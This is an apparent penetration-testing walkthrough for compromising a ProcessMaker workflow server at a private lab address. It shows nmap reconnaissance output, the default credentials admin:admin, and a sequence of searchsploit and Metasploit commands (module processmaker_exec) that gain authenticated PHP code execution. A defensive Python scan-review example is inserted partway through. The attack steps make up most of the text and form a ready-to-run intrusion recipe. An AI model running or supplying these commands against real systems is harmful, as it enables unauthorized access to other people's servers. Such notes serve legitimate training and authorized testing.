Workflow platform (ProcessMaker)
Exploit a vulnerable ProcessMaker server with Metasploit
nmap -sS -sV 10.2.27.1
80/tcp open http Apache httpd 2.2.23 ((Win32) PHP/5.2.14)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Enumeration
Explore the web application hosted on the web server before running any vulnerability scanners
firefox 10.2.27.1
View the web page source code. In this case no version information can be found.
Search online for ProcessMaker default credentials
admin:admin
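
Added example (not part of the original notes): a defender-side review of the scan output above, in Python, that flags the end-of-life Apache/PHP versions and the database and remote-access ports reachable on this host. The restricted-service list and minimum-version values are assumptions to replace with your own baseline.

```python
import re

# Constructed sample: service lines copied from the scan above, not live output.
SAMPLE_SCAN = """\
80/tcp open http Apache httpd 2.2.23 ((Win32) PHP/5.2.14)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
"""

LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
VERSION_RE = re.compile(r"(Apache httpd|PHP)[ /](\d+)\.(\d+)(?:\.\d+)?")

# Assumed policy: services that should not be reachable from a user network.
RESTRICTED = {"mysql": "database listener", "ms-wbt-server": "RDP",
              "microsoft-ds": "SMB", "netbios-ssn": "NetBIOS"}
# Assumed policy: oldest supported (major, minor) per product; adjust to your baseline.
MIN_SUPPORTED = {"Apache httpd": (2, 4), "PHP": (8, 1)}

def parse_services(scan_text):
    """Return (port, service, banner) for every open-port line of nmap -sV output."""
    services = []
    for line in scan_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            # nmap marks guessed services with '?' and TLS-wrapped ones with 'ssl/'.
            name = m.group(3).rstrip("?").split("/")[-1]
            services.append((int(m.group(1)), name, m.group(4)))
    return services

def review(scan_text):
    """Return (port, finding) tuples describing what to remediate."""
    findings = []
    for port, name, banner in parse_services(scan_text):
        if name in RESTRICTED:
            findings.append((port, f"{RESTRICTED[name]} exposed: restrict by firewall"))
        for product, major, minor in VERSION_RE.findall(banner):
            if (int(major), int(minor)) < MIN_SUPPORTED[product]:
                findings.append((port, f"{product} {major}.{minor} is end-of-life: upgrade"))
    return findings

if __name__ == "__main__":
    for port, finding in review(SAMPLE_SCAN):
        print(f"{port}/tcp  {finding}")
```

The default admin:admin login found during enumeration does not appear in scan output and has to be checked separately on the application itself.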

Exploitation
searchsploit ProcessMaker
# Try "ProcessMaker Open Source - (Authenticated) PHP Code Execution (Metasploit)"
cd Desktop
searchsploit -m 29325
less 29325.rb
rm 29325.rb
# In this case a Metasploit module will be used
service postgresql start && msfconsole -q
db_status
setg RHOSTS 10.2.27.1
setg RHOST 10.2.27.1
workspace -a ProcessMaker
search ProcessMaker
use exploit/multi/http/processmaker_exec
options
set USERNAME admin
set PASSWORD admin
run